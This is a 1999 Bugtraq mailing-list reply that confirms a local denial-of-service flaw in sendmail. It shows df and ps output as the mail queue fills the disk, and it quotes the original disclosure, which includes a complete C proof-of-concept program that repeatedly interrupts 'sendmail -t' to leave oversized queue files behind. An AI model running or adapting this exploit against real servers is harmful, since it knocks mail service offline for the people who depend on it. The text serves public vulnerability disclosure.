[10079] in bugtraq
Re: Possible local DoS in sendmail
daemon@ATHENA.MIT.EDU (KuRuPTioN)
Thu Apr 1 15:23:17 1999
Date: Thu, 1 Apr 1999 14:41:41 -0500
Reply-To: KuRuPTioN <kuruption@CHA0S.COM>
From: KuRuPTioN <kuruption@CHA0S.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.4.10.9904011342050.21573-100000@noname.kki.krakow.pl>
Well, this is very interesting... this is what I found my running this
binary for 30 seconds =)
Before:
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 87681 199909 30% /
# ps auwx | grep sendmail
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail:
accepting connections on port 25
# ls -l /var/spool/mqueue
total 0
#
After (30 seconds running):
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 107548 180042 37% /
(not too bad but another 30 seconds later another df)
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 146235 141355 51% /
# ps auwx | grep sendmail
mail 17144 70.5 0.4 1348 820 p1 R 11:35 0:48
/usr/sbin/sendmail -t
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail:
accepting connections on port 25
(sendmail kindly using 70% of my CPU)
# ls -l /var/spool/mqueue
total 115854
-rw------- 1 mail mail 118169600 Apr 1 11:37 dfLAA17144
-rw------- 1 mail mail 0 Apr 1 11:35 qfLAA17144
-rw------- 1 mail mail 0 Apr 1 11:35 xfLAA17144
(once again a df)
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 224734 62856 78% /
and once the hard drive becomes filled sendmail stops accepting connections
since it has no temp space.
# df /
Filesystem 1024-blocks Used Available Capacity Mounted on
/dev/hda1 303251 287590 0 100% /
# ps auwx | grep sendmail
mail 17144 68.5 0.4 1348 820 p1 R 11:35 2:33
/usr/wrapped/sendmail -t
root 1427 0.0 0.4 1324 816 ? S Mar 27 0:00 sendmail:
rejecting connections on port 25: min free: 100
#
People, this is no april fools joke =)
Raymond T Sundland
MCSE, MCP, MCP+Internet
PGP Key: finger pgp@24.3.181.22
|-----Original Message-----
|From: Bugtraq List [mailto:BUGTRAQ@NETSPACE.ORG]On Behalf Of Lukasz
|Luzar
|Sent: Thursday, April 01, 1999 9:00 AM
|To: BUGTRAQ@NETSPACE.ORG
|Subject: Possible local DoS in sendmail
|
|
|Hi,
|It seems that sendmail ran with -t option does NOT block SIGINT ...
|In that moment while we are sending data to its stdin, when we will press
|CTRL-C process is being killed, but in queue rests unfinished letter.
|It stays there quite long - long enought to fullfill partition on
|disk where
|/var/spool/mqueue resides.
|When it happends, sendmail doesn't allow new connections - so it is a kind
|of DoS attack for this service.
|It has been tested on all new versions on sendmail up to current (8.9.3).
|
|Example ...
|
| --- CUT HERE ----
| #include <stdio.h>
| #include <unistd.h>
| #include <signal.h>
| #include <sys/wait.h>
|
| #define DELAY 5 /* time in seconds needed to reach
| MaxMessageSize limit */
| #define SM_PATH "/usr/sbin/sendmail -t"
|
| void main()
| {
| FILE *fd;
| int pid;
|
| for(;;) {
| if(( pid = fork()) == 0) {
| setpgrp();
| if(( fd = popen( SM_PATH, "w")) == NULL)
| fprintf( stderr, "popen error\n");
|
| for(;;) fputc( 'A', fd);
| } else {
| sleep( DELAY);
| kill( (-1) * pid, SIGINT);
| fprintf( stdout, "next\n");
| wait( NULL);
| }
| }
| }
|--- CUT HERE ---
|
|Regards,
|
|---
|Lukasz Luzar K.K.I.
|http://noname.kki.krakow.pl/ lluzar@kki.pl
|
